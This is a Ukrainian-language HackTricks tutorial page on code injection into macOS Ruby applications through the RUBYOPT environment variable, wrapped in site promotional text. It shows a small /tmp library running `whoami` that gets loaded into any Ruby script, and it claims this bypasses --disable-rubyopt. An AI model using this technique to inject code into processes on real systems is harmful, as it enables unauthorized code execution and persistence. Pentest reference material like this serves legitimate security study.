macOS Ruby Applications Injection

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити свою компанію в рекламі на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.

RUBYOPT

Використовуючи цю змінну середовища, можна додавати нові параметри до ruby кожного разу, коли він виконується. Хоча параметр -e не може бути використаний для вказання коду Ruby для виконання, можна використовувати параметри -I та -r, щоб додати нову теку до шляху завантаження бібліотек та потім вказати бібліотеку для завантаження.

Створіть бібліотеку inject.rb у /tmp:

inject.rb

puts `whoami`

Створіть будь-де скрипт на Ruby, подібний до:

hello.rb

puts 'Hello, World!'

Потім запустіть довільний скрипт Ruby, щоб завантажити його за допомогою:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Цікавий факт, це працює навіть з параметром --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити рекламу вашої компанії на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 1 month ago